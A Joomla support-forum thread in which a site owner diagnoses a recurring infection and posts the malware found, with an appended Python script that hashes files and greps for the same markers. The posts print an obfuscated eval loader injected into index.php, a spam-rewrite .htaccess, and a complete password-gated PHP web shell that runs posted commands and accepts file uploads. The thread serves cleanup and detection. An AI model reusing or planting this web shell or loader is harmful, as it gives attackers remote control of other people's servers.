Site keeps getting infected even with SecurityCheck Pro

3 years 3 weeks ago - 3 years 3 weeks ago #4509 by shibumi
If I delete the SecurityCheck Pro generated .htaccess file I can get back into the front end... as soon as I generate a new .htaccess file with SecurityCheck Pro, I can no longer access the site's front end... delete the .htaccess file and I am able to access the front end again...
Back end access still accessible in both situations.

Don't know if this matters or not, but I upgraded my server to EasyApache4 with all sites now running PHP 7
Last edit: 3 years 3 weeks ago by shibumi.

3 years 3 weeks ago #4510 by Jose
Try setting the first dropdowns to No (don't forget to save the changes); they sometimes cause issues on some servers.

Regards,
Jose

3 years 3 weeks ago - 3 years 3 weeks ago #4511 by shibumi
No change... I use the same settings for all of my sites, and this is the only one giving me problems. The only way I can access the site is deleting the .htaccess file completely - if I revert back to the original Joomla .htaccess file, it works fine...

* after using the default Joomla 3.7.0 .htaccess file, then using SecurityCheck Pro to generate a new one, not getting 403 Forbidden message anymore... so strange
Last edit: 3 years 3 weeks ago by shibumi. Reason: new information

3 years 3 weeks ago #4512 by Jose
Then this is a permissions issue; check if the user that runs Joomla has permissions to access the .htaccess file generated. Maybe the update you did is causing the issue.

Regards,
Jose

3 years 3 weeks ago #4536 by shibumi
Okay, so I turned off my AutoSSL feature for this domain on my WHM, and something is still wiping my .htaccess file that is generated with SecurityCheck Pro, and this morning it was overwritten with this content:
RewriteEngine On
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).html$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

instead of the usual:
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$

RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$

and, instead of the normal AutoSSL modified timestamp of today's date at 5:23am, it has a timestamp of December 11, 2009 8:01pm

At first I thought it was the AutoSSL feature that was wiping my .htaccess file to put its code in, but after turning off that feature and seeing that the .htaccess file was still getting wiped and different code inserted, I believe there is something else I'm missing.

File integrity check only shows 4 files modified:
File               Path                                  Size     Modified             Status
.htaccess          /public_html/.htaccess                267      2009-12-11 18:01:59  Hash value has changed
error_log          /public_html/administrator/error_log  6523153  2017-05-07 08:24:50  Hash value has changed
configuration.php  /public_html/configuration.php        3129     2017-05-07 13:23:20  Hash value has changed
index.php          /public_html/index.php                18083    2010-03-26 13:56:58  Hash value has changed

both .htaccess and index.php files were modified sometime between 10:00pm EDT last night and 1:00pm EDT today...

Malware scan shows 6 High alert files, and 58 medium alert files. Upon further inspection - I installed ZOO on a local copy of Joomla 3.7.0 and it doesn't even have a /media/zoo/applications/documentation folder - the only folder under applications is blog and page, nothing else. I'm not familiar with ZOO extensions, but again, I didn't build this site, and I don't have access to their "paid" extensions to confirm original code. I have attached the malware scan results from today's scan.

My root index.php file is once again injected with the same code after the opening <?php :
@set_time_limit(0);
$xmlname = 'mapss.xml';
$jdir = '';
$smuri_tmp = smrequest_uri();
if($smuri_tmp==''){
	$smuri_tmp='/';
}
$smuri = base64_encode($smuri_tmp);
$dt = 0;
function smrequest_uri(){
	if (isset($_SERVER['REQUEST_URI'])){        
		$smuri = $_SERVER['REQUEST_URI'];        
	}else{
		if(isset($_SERVER['argv'])){       
			$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];     
		}else{      
			$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];        
		}
	}        
	return $smuri;        
} 


$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iZGtmck9jeHdXakJiWk

... more code here ...

Cc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
3 years 3 weeks ago #4537 by shibumi
So, I started uninstalling some extensions, namely ZOO and DJImageSlider, and ran malware scans after each removal. Now getting only 20 suspicious files, and found this file: /libraries/joomla/model/class.php - not part of the Joomla core files, so I looked at the code:
<?php 
ini_set('display_errors','Off');
error_reporting('E_ALL');
$multipart = "51c78cfb5147c2cfc";
$part = "12eb7b37ab656fe";
if (md5($_POST['multipart'])==$multipart.$part){
echo '
<div align="left">
<font size="1">:</font>
</div>
<form action="'.$_SERVER['PHP_SELF'].'" name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="30" class="input">
<input type="hidden" name="multipart" size="30" class="pp" value="'.$_POST['multipart'].'">
<br>
<pre>';
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
echo  "<p>".@getcwd()."</p>";
}
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
   $pwddir = $_POST['dir'];
   $real = $_FILES['file']['name'];
   $dez = $pwddir."/".$real;
   copy($uploaded, $dez);
   echo "<p>$dez</p>";
}
echo '<form action="'.$_SERVER['PHP_SELF'].'" name="form1" method="post" enctype="multipart/form-data">
 <input type="text" name="dir" size="30" value="'.passthru("pwd").'">
 <input type="submit" name="submit2" value="Upload">
 <input type="file" name="file" size="15">
 <input type="hidden" name="multipart" size="30" class="pp" value="'.$_POST['multipart'].'">
	  </td>
    </tr>
</table>';
}
else 
{
echo '<head><form name="multipart" method="POST" enctype="multipart/form-data">
<input type="text" name="multipart" size="30" class="input">';
}
echo '</body>
</html>';
?>
Delete file, fix .htaccess file, remove code from index.php, and wait to see what happens tomorrow...
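As an added example (my own code, not the extension's and not anything posted in this thread), a small Python integrity check that covers the last two posts: it baselines a tree by hash and mtime the way the file integrity scan above does, flags files whose hash changed while their timestamp went backwards (the 2009 stamp on .htaccess and index.php), and greps .php files and .htaccess for the markers quoted in the thread (the $O00OO0=urldecode/eval stub, passthru of a POSTed command, the tempweb/smid rewrite). The marker labels and the site layout are assumptions.

```python
import hashlib
import os
import re

# Markers taken from the snippets posted in this thread (obfuscated index.php stub,
# class.php web shell, rewritten .htaccess). The labels are my own.
PHP_MARKERS = {
    "obfuscated decoder stub ($O00OO0=urldecode)": re.compile(r"\$O0[O0]{4}\s*=\s*urldecode\("),
    "eval of decoded payload": re.compile(r"eval\s*\(\s*\$O[O0]{5}\("),
    "command execution from request": re.compile(
        r"\b(passthru|system|shell_exec|exec)\s*\(\s*\$(cmd|_POST|_GET|_REQUEST)\b"),
}
HTACCESS_MARKER = re.compile(r"RewriteRule\s+\S+\s+index\.php\?tempweb=")


def snapshot(root):
    """Baseline like the integrity check's: relative path -> (sha256, mtime)."""
    base = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            base[os.path.relpath(full, root)] = (digest, os.stat(full).st_mtime)
    return base


def audit(root, baseline):
    """Return (relpath, finding) pairs: hash drift, backdated mtimes and content markers."""
    findings, current = [], snapshot(root)
    for rel in sorted(set(current) | set(baseline)):
        if rel not in current:
            findings.append((rel, "file removed"))
            continue
        digest, mtime = current[rel]
        if rel not in baseline:
            findings.append((rel, "file not in baseline"))
        elif digest != baseline[rel][0]:
            findings.append((rel, "Hash value has changed"))
            if mtime < baseline[rel][1]:  # content changed but mtime moved backwards
                findings.append((rel, "mtime backdated"))
        with open(os.path.join(root, rel), errors="replace") as fh:
            text = fh.read()
        for label, rx in (PHP_MARKERS.items() if rel.endswith(".php") else ()):
            if rx.search(text):
                findings.append((rel, label))
        if os.path.basename(rel) == ".htaccess" and HTACCESS_MARKER.search(text):
            findings.append((rel, "spam rewrite (tempweb/smid) in .htaccess"))
    return findings
```

Run snapshot() once on a known-clean tree and keep the result off the web root; run audit() against it daily so a backdated re-infection like the one above is reported by hash drift rather than by mtime.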
